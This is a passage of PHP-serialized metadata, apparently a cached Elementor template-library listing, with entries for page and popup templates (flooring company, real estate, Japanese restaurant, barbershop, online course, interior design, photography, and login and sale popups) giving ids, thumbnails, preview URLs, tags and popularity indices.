bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:645;s:11:\"trend_index\";i:704;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:496;a:14:{s:2:\"id\";i:14947;s:5:\"title\";s:33:\"Flooring company &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/08/Services.png\";s:12:\"tmpl_created\";i:1597740551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/flooring-company-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:673;s:11:\"trend_index\";i:139;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:497;a:14:{s:2:\"id\";i:10403;s:5:\"title\";s:15:\"Classic | Login\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/hello_small.png\";s:12:\"tmpl_created\";i:1548056371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:570;s:11:\"trend_index\";i:635;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:498;a:14:{s:2:\"id\";i:14901;s:5:\"title\";s:29:\"Flooring Company &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/08/Home.png\";s:12:\"tmpl_created\";i:1597740474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/flooring-company-home/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:639;s:11:\"trend_index\";i:131;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:499;a:14:{s:2:\"id\";i:9913;s:5:\"title\";s:27:\"Classic | Login | Christmas\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/log_small.png\";s:12:\"tmpl_created\";i:1547841430;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:530;s:11:\"trend_index\";i:451;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:500;a:14:{s:2:\"id\";i:14737;s:5:\"title\";s:32:\"Luxury Real Estate &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/About.png\";s:12:\"tmpl_created\";i:1595313527;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/luxury-real-estate-about-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:627;s:11:\"trend_index\";i:302;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:501;a:14:{s:2:\"id\";i:14756;s:5:\"title\";s:34:\"Luxury Real Estate &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Contact-Us.png\";s:12:\"tmpl_created\";i:1595313519;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/luxury-real-estate-contact-us-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:658;s:11:\"trend_index\";i:303;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:502;a:14:{s:2:\"id\";i:14716;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Home.png\";s:12:\"tmpl_created\";i:1595313512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/luxury-real-estate-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:569;s:11:\"trend_index\";i:201;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:503;a:14:{s:2:\"id\";i:14763;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; News\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/07/news-Archive.png\";s:12:\"tmpl_created\";i:1595313273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/luxury-real-estate-news-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"real estate\",\"realestate\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:589;s:11:\"trend_index\";i:168;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:504;a:14:{s:2:\"id\";i:9592;s:5:\"title\";s:26:\"Classic | Promotion | Sale\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2019/01/Classic_Promotion_small_01.png\";s:12:\"tmpl_created\";i:1546963720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/popups/classic-promotion-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:26;s:16:\"popularity_index\";i:607;s:11:\"trend_index\";i:601;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:505;a:14:{s:2:\"id\";i:13960;s:5:\"title\";s:32:\"Japanese restaurant &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/06/Home-Page.jpg\";s:12:\"tmpl_created\";i:1592289775;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/japanese-restaurant-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:26;s:16:\"popularity_index\";i:603;s:11:\"trend_index\";i:270;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:506;a:14:{s:2:\"id\";i:10210;s:5:\"title\";s:29:\"Classic | Promotion | Webinar\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/web_small-1.png\";s:12:\"tmpl_created\";i:1547886103;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/classic-promotion-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:27;s:16:\"popularity_index\";i:720;s:11:\"trend_index\";i:696;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:507;a:14:{s:2:\"id\";i:13993;s:5:\"title\";s:45:\"Japanese restaurant &#8211; Chef&#8217;s Menu\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/06/Chef_s-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/japanese-restaurant-chefs-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:27;s:16:\"popularity_index\";i:654;s:11:\"trend_index\";i:504;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:508;a:14:{s:2:\"id\";i:14012;s:5:\"title\";s:36:\"Japanese restaurant &#8211; Bar Menu\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/06/Bar-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/japanese-restaurant-bar-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:700;s:11:\"trend_index\";i:526;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:509;a:14:{s:2:\"id\";i:13917;s:5:\"title\";s:33:\"Japanese restaurant &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/06/About-Page.jpg\";s:12:\"tmpl_created\";i:1592289629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/japanese-restaurant-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:656;s:11:\"trend_index\";i:375;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:510;a:14:{s:2:\"id\";i:13937;s:5:\"title\";s:35:\"Japanese restaurant &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1592289748;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/japanese-restaurant-gallery/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:30;s:16:\"popularity_index\";i:670;s:11:\"trend_index\";i:395;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:511;a:14:{s:2:\"id\";i:10047;s:5:\"title\";s:15:\"Classic | Login\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/yellow_small.png\";s:12:\"tmpl_created\";i:1547847757;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:30;s:16:\"popularity_index\";i:503;s:11:\"trend_index\";i:450;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:512;a:14:{s:2:\"id\";i:9879;s:5:\"title\";s:38:\"Classic | Register | Subscribe | Leads\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/dog_small.png\";s:12:\"tmpl_created\";i:1547838416;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/classic-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:612;s:11:\"trend_index\";i:657;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:513;a:14:{s:2:\"id\";i:14030;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Events\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/06/Events-Page.jpg\";s:12:\"tmpl_created\";i:1592289713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/japanese-restaurant-events/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:711;s:11:\"trend_index\";i:473;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:514;a:14:{s:2:\"id\";i:13984;s:5:\"title\";s:40:\"Japanese restaurant &#8211; Reservations\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/reservations.jpg\";s:12:\"tmpl_created\";i:1592294757;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/japanese-restaurant-reservations/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:699;s:11:\"trend_index\";i:494;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:515;a:14:{s:2:\"id\";i:13479;s:5:\"title\";s:23:\"Barbershop &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Home-Page.jpg\";s:12:\"tmpl_created\";i:1589893275;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/barbershop-home/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:33;s:16:\"popularity_index\";i:644;s:11:\"trend_index\";i:592;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:516;a:14:{s:2:\"id\";i:13503;s:5:\"title\";s:24:\"Barbershop &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/05/About-Page.jpg\";s:12:\"tmpl_created\";i:1589893289;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/barbershop-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:34;s:16:\"popularity_index\";i:697;s:11:\"trend_index\";i:631;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:517;a:14:{s:2:\"id\";i:10297;s:5:\"title\";s:14:\"Classic | Sale\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/01/s_yellow_small.png\";s:12:\"tmpl_created\";i:1548056099;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:35;s:16:\"popularity_index\";i:547;s:11:\"trend_index\";i:612;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:518;a:14:{s:2:\"id\";i:13548;s:5:\"title\";s:27:\"Barbershop &#8211; Services\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/05/Services-Page.jpg\";s:12:\"tmpl_created\";i:1589893298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/barbershop-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:35;s:16:\"popularity_index\";i:709;s:11:\"trend_index\";i:710;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:519;a:14:{s:2:\"id\";i:10393;s:5:\"title\";s:14:\"Classic | Sale\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/blue_small.png\";s:12:\"tmpl_created\";i:1548056682;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:36;s:16:\"popularity_index\";i:621;s:11:\"trend_index\";i:714;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:520;a:14:{s:2:\"id\";i:13560;s:5:\"title\";s:26:\"Barbershop &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1589893307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/barbershop-gallery/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:36;s:16:\"popularity_index\";i:707;s:11:\"trend_index\";i:672;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:521;a:14:{s:2:\"id\";i:13587;s:5:\"title\";s:26:\"Barbershop &#8211; Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/05/Contact-Us-Page.jpg\";s:12:\"tmpl_created\";i:1589893315;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/barbershop-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:37;s:16:\"popularity_index\";i:703;s:11:\"trend_index\";i:706;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:522;a:14:{s:2:\"id\";i:10579;s:5:\"title\";s:14:\"Classic | Sale\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/sale1_small.png\";s:12:\"tmpl_created\";i:1547967887;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:38;s:16:\"popularity_index\";i:657;s:11:\"trend_index\";i:608;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:523;a:14:{s:2:\"id\";i:13307;s:5:\"title\";s:26:\"Online Course &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.jpg\";s:12:\"tmpl_created\";i:1587474541;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/online-course-home/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:38;s:16:\"popularity_index\";i:311;s:11:\"trend_index\";i:101;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:524;a:14:{s:2:\"id\";i:13328;s:5:\"title\";s:27:\"Online Course &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/About.jpg\";s:12:\"tmpl_created\";i:1587474558;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/online-course-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:39;s:16:\"popularity_index\";i:540;s:11:\"trend_index\";i:293;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:525;a:14:{s:2:\"id\";i:13338;s:5:\"title\";s:33:\"Online Course &#8211; Course Page\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Course-Page.png\";s:12:\"tmpl_created\";i:1587474574;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/online-course-course-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:40;s:16:\"popularity_index\";i:384;s:11:\"trend_index\";i:203;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:526;a:14:{s:2:\"id\";i:13352;s:5:\"title\";s:29:\"Online Course &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1587474591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/online-course-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:41;s:16:\"popularity_index\";i:562;s:11:\"trend_index\";i:279;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:527;a:14:{s:2:\"id\";i:13187;s:5:\"title\";s:33:\"Interior Design &#8211; Home Page\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.png\";s:12:\"tmpl_created\";i:1586148661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/interior-design-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"business\",\"interior design\"]\";s:10:\"menu_order\";i:42;s:16:\"popularity_index\";i:376;s:11:\"trend_index\";i:340;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:528;a:14:{s:2:\"id\";i:10180;s:5:\"title\";s:21:\"Fly In | Announcement\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/glass_small.png\";s:12:\"tmpl_created\";i:1548045309;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/fly-in-announcement-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:623;s:11:\"trend_index\";i:682;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:529;a:14:{s:2:\"id\";i:13199;s:5:\"title\";s:29:\"Interior Design &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/About.png\";s:12:\"tmpl_created\";i:1586148666;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/interior-design-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"business\",\"interior design\"]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:362;s:11:\"trend_index\";i:202;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:530;a:14:{s:2:\"id\";i:13214;s:5:\"title\";s:32:\"Interior Design &#8211; Projects\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/portfolio_s.jpg\";s:12:\"tmpl_created\";i:1586148672;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/interior-design-projects/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"business\",\"interior design\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:406;s:11:\"trend_index\";i:229;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:531;a:14:{s:2:\"id\";i:13229;s:5:\"title\";s:31:\"Interior Design &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/Contact-Us.png\";s:12:\"tmpl_created\";i:1586148677;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/interior-design-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"business\",\"interior design\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:434;s:11:\"trend_index\";i:231;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:532;a:14:{s:2:\"id\";i:9731;s:5:\"title\";s:26:\"Classic | Sale | Promotion\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/01/icecream_small.png\";s:12:\"tmpl_created\";i:1547976166;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/popups/classic-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:587;s:11:\"trend_index\";i:543;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:533;a:14:{s:2:\"id\";i:12948;s:5:\"title\";s:29:\"Photography &#8211; Home Page\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/02/Home_s.png\";s:12:\"tmpl_created\";i:1582093442;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/photography-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:27:\"[\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:292;s:11:\"trend_index\";i:143;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:534;a:14:{s:2:\"id\";i:12798;s:5:\"title\";s:25:\"Photography &#8211; About\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/02/About_s.png\";s:12:\"tmpl_created\";i:1582093446;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/photography-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:27:\"[\"Photography\",\"portfolio\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:488;s:11:\"trend_index\";i:480;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:535;a:14:{s:2:\"id\";i:12868;s:5:\"title\";s:27:\"Photography &#8211; 